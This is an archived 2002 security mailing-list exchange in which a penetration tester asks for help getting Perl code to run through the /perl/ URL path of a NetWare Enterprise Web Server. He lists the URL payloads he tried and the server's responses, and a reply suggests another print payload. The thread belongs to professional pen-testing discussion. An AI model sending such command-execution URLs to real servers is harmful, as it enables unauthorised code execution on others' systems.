RE: Re-opening an old thread: NetWare-Enterprise-Web-Server/5.1 --As sistence requested.

Thu, 19 Dec 2002 11:10:24 -0800 

How about send it some HTML?  Something like:

http://address/perl/-e%20print%20<html><body>hello%20world</body></html>


You might have to change the tags and/or add a "Content-type: text/html"


Bob Mahan
Network Security Operations 
Phone: (847) 571-5525
mailto:[EMAIL PROTECTED]
http://www.nsoco.com

> -----Original Message-----
> From: Ralph Los [mailto:[EMAIL PROTECTED]] 
> Sent: Wednesday, December 18, 2002 2:29 PM
> To: [EMAIL PROTECTED]
> Subject: Re-opening an old thread: 
> NetWare-Enterprise-Web-Server/5.1 --As sistence requested.
> Sensitivity: Confidential
> 
> 
> Hey - let me re-open a thread again, if you folks don't mind. 
>  I've found a server at one of our pen-test clients with this 
> NetWare HTTP/HTTPS server. I've been trying to figure out a 
> way to make it tango, but have been having some problems.  
> Here's what I've tried and where I left off, maybe someone 
> can toss some suggestions out.
> 
> Attempt:  http://address/perl/-v
> Result:       NetWare port Copyright 1998 Novell Corporation.
>               All rights reserved.
> 
> Attempt: http://address/perl/-h
> Result:       Page not found
> 
> Attempt: http://address/perl/-e%20print%20%22hello%20world%22;
> Result: IE just hangs there "DONE"
> 
> Attempt: http://address/perl/-e%20print%201;
> Result: IE just hangs there "DONE"
> 
> So what's up?  Is this box "patched" against this form of 
> attack somehow? Could someone throw me another idea maybe?
> 
> Thanks a bunch.
> 
> 
> --------------------------------------------------------------
> --------------
> This list is provided by the SecurityFocus Security 
> Intelligence Alert (SIA) Service. For more information on 
> SecurityFocus' SIA service which automatically alerts you to 
> the latest security vulnerabilities please see: 
https://alerts.securityfocus.com/





----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Reply via email to